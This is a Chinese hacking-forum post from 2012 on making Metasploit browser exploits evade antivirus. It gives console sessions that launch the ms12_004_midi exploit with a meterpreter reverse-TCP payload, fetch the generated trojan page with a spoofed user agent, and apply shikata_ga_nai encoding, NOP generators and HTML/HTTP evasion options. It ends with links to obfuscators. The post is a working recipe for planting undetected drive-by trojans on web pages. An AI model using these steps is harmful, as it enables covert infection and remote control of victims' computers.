切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
[片段]Metasploit网马的免杀[复制链接]
发表于 2012-10-2 15:35:24 | 显示全部楼层 |!read_mode!
关于网马近几年国内网站挂马呈现井喷式的增长,网马解密也逐步为人们所重视
网马就是在网页中植入木马,你打开网页就运行了木马程序,使你在不知不觉中中毒。
网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。
为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。

关于metasploitmetasploit聚合了上百的网马,你可以随心使用喜欢的shellcode,让渗透更加简单,但是在这工程中,如果对方按张了防火墙咋办?
就像下图:


网马免杀哪最新的midiOutPlayNextPolyEvent Heap Overflow来说  ,先生成一个普通的
  1. msf > use exploit/windows/browser/ms12_004_midi
  2. msf  exploit(ms12_004_midi) > show options

  3. Module options (exploit/windows/browser/ms12_004_midi):

  4.    Name        Current Setting  Required  Description
  5.    ----        ---------------  --------  -----------
  6.    OBFUSCATE   false            no        Enable JavaScript obfuscation
  7.    SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  8.    SRVPORT     8080             yes       The local port to listen on.
  9.    SSL         false            no        Negotiate SSL for incoming connections
  10.    SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
  11.    SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  12.    URIPATH                      no        The URI to use for this exploit (default is random)


  13. Payload options (windows/meterpreter/reverse_tcp):

  14.    Name      Current Setting  Required  Description
  15.    ----      ---------------  --------  -----------
  16.    EXITFUNC  process          yes       Exit technique: seh, thread, process, none
  17.    LHOST     5.5.5.1          yes       The listen address
  18.    LPORT     4444             yes       The listen port


  19. Exploit target:

  20.    Id  Name
  21.    --  ----
  22.    0   Automatic


  23. msf  exploit(ms12_004_midi) > exploit
  24. [*] Exploit running as background job.

  25. [*] Started reverse handler on 5.5.5.1:4444
  26. [*] Using URL: http://0.0.0.0:8080/qhvy86C7TNlbqQN
  27. [*]  Local IP: http://112.114.168.177:8080/qhvy86C7TNlbqQN
  28. [*] Server started.
  29. msf  exploit(ms12_004_midi) >
复制代码
查看网马代码 看看传说中的网马
  1. brk@Dis9Team:~$ wget -U "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5)" http://112.114.168.177:8080/qhvy86C7TNlbqQN -O 1 | more 1
  2. --2012-03-12 01:18:15--  http://112.114.168.177:8080/qhvy86C7TNlbqQN
  3. 正在连接 112.114.168.177:8080... 已连接。
  4. 已发出 HTTP 请求,正在等待回应... 200 OK
  5. 长度: 35426 (35K) [text/html]
  6. 正在保存至: “1”

  7. 100%[======================================>] 35,426      --.-K/s   花时 0s   

  8. 2012-03-12 01:18:15 (213 MB/s) - 已保存 “1” [35426/35426])

  9. ::::::::::::::
  10. 1
  11. ::::::::::::::

  12. <html>
  13. <head>
  14. <script language='javascript'>
  15.         //
  16. //   JavaScript Heap Exploitation library
  17. //   by Alexander Sotirov <[email protected]>
  18. //  
  19. //   Version 0.3
  20. //
  21. // Copyright (c) 2007, Alexander Sotirov
  22. // All rights reserved.
  23. //
  24. // The HeapLib library is licensed under a BSD license, the text of which follow
  25. s:
  26. //
  27. // Redistribution and use in source and binary forms, with or without
  28. // modification, are permitted provided that the following conditions
  29. // are met:
  30. //
  31. // 1. Redistributions of source code must retain the above copyright
  32. //    notice, this list of conditions and the following disclaimer.
  33. // 2. Redistributions in binary form must reproduce the above copyright
  34. //    notice, this list of conditions and the following disclaimer in the
  35. //    documentation and/or other materials provided with the distribution.
  36. // 3. Neither the name of Alexander Sotirov nor the name of Determina Inc.
  37. //    may be used to endorse or promote products derived from this software
  38. //    without specific prior written permission.
复制代码
恩 操蛋啊 明文的 不被杀才挂ENCODER免杀Metasploit提供了SHELLCODE生成EXE PHP VBS DLL等等 也提供了免杀的功能,网马呢? 能的
先结束网马进程
  1. msf  exploit(ms12_004_midi) > jobs

  2. Jobs
  3. ====

  4.   Id  Name
  5.   --  ----
  6.   0   Exploit: windows/browser/ms12_004_midi

  7. msf  exploit(ms12_004_midi) > kill 0
  8. Stopping job: 0...

  9. [*] Server stopped.
  10. msf  exploit(ms12_004_midi) >
复制代码
用ENCODER进行网页编码  可选项:
  1. set ENCODER cmd/generic_sh          set ENCODER x86/call4_dword_xor
  2. set ENCODER cmd/ifs                 set ENCODER x86/context_cpuid
  3. set ENCODER cmd/printf_php_mq       set ENCODER x86/context_stat
  4. set ENCODER generic/none            set ENCODER x86/context_time
  5. set ENCODER mipsbe/longxor          set ENCODER x86/countdown
  6. set ENCODER mipsle/longxor          set ENCODER x86/fnstenv_mov
  7. set ENCODER php/base64              set ENCODER x86/jmp_call_additive
  8. set ENCODER ppc/longxor             set ENCODER x86/nonalpha
  9. set ENCODER ppc/longxor_tag         set ENCODER x86/nonupper
  10. set ENCODER sparc/longxor_tag       set ENCODER x86/shikata_ga_nai
  11. set ENCODER x64/xor                 set ENCODER x86/single_static_bit
  12. set ENCODER x86/alpha_mixed         set ENCODER x86/unicode_mixed
  13. set ENCODER x86/alpha_upper         set ENCODER x86/unicode_upper
  14. set ENCODER x86/avoid_utf8_tolower  
复制代码
我用x86/shikata_ga_nai吧
  1. msf  exploit(ms12_004_midi) > set ENCODER x86/shikata_ga_nai
  2. ENCODER => x86/shikata_ga_nai
  3. msf  exploit(ms12_004_midi) > exploit -j
  4. [*] Exploit running as background job.

  5. [*] Started reverse handler on 5.5.5.1:4444
  6. [*] Using URL: http://0.0.0.0:8080/gNaH1Zi9e5
  7. [*]  Local IP: http://112.114.168.177:8080/gNaH1Zi9e5
  8. [*] Server started.
  9. msf  exploit(ms12_004_midi) >
复制代码

nops一序列的0x90的位元组,Metasploit可生成不可预测的
  1. msf  exploit(ms11_050_mshtml_cobjectelement) > show nops

  2. NOP Generators
  3. ==============

  4.    Name             Disclosure Date  Rank    Description
  5.    ----             ---------------  ----    -----------
  6.    armle/simple                      normal  Simple
  7.    php/generic                       normal  PHP Nop Generator
  8.    ppc/simple                        normal  Simple
  9.    sparc/random                      normal  SPARC NOP generator
  10.    tty/generic                       normal  TTY Nop Generator
  11.    x64/simple                        normal  Simple
  12.    x86/opty2                         normal  Opty2
  13.    x86/single_byte                   normal  Single Byte
复制代码
evasion恩,查看一下:
  1. msf  exploit(ms11_050_mshtml_cobjectelement) > show evasion

  2. Module evasion options:

  3.    Name           : HTML::base64
  4.    Current Setting: double_pad
  5.    Description    : Enable HTML obfuscation via an embeded base64 html object (IE
  6.       not supported) (accepted: none, plain, single_pad, double_pad,
  7.       random_space_injection)

  8.    Name           : HTML::javascript::escape
  9.    Current Setting: 0
  10.    Description    : Enable HTML obfuscation via HTML escaping (number of iterations)

  11.    Name           : HTML::unicode
  12.    Current Setting: utf-32le
  13.    Description    : Enable HTTP obfuscation via unicode (accepted: none, utf-16le,
  14.       utf-16be, utf-16be-marker, utf-32le, utf-32be)

  15.    Name           : HTTP::chunked
  16.    Current Setting: false
  17.    Description    : Enable chunking of HTTP responses via "Transfer-Encoding:
  18.       chunked"

  19.    Name           : HTTP::compression
  20.    Current Setting: none
  21.    Description    : Enable compression of HTTP responses via content encoding
  22.       (accepted: none, gzip, deflate)

  23.    Name           : HTTP::header_folding
  24.    Current Setting: false
  25.    Description    : Enable folding of HTTP headers

  26.    Name           : HTTP::junk_headers
  27.    Current Setting: false
  28.    Description    : Enable insertion of random junk HTTP headers

  29.    Name           : HTTP::server_name
  30.    Current Setting: Apache
  31.    Description    : Configures the Server header of all outgoing replies

  32.    Name           : TCP::max_send_size
  33.    Current Setting: 0
  34.    Description    : Maximum tcp segment size.  (0 = disable)

  35.    Name           : TCP::send_delay
  36.    Current Setting: 0
  37.    Description    : Delays inserted before every send.  (0 = disable)


  38. msf  exploit(ms11_050_mshtml_cobjectelement) >
复制代码
这个很简单 选择就行Social-Engineer ToolkitSocial-Engineering Toolkit(SET) 是一个由 David Kennedy (ReL1K)设计的社会工程学工具.SET在统一简单的界面上集成了多个有用的社会工程学攻击工具,他主要就是利用了metasploit的网马 + 网页伪造 + DNS 欺骗,这个需要装好多东西,有功夫的自己搞自动动手生成了网马用wget伪造AGENT下载以后进行免杀http://www.daftlogic.com/projects-online-javascript-obfuscator.htmhttp://javascriptcompressor.comhttp://dean.edwards.name/weblog/2007/04/packer3更改源代码http://funoverip.net/2011/04/100pc-anti-virus-evasion-with-metasploit-browser-exploits-from-ms11-003/




附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-2 03:17

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部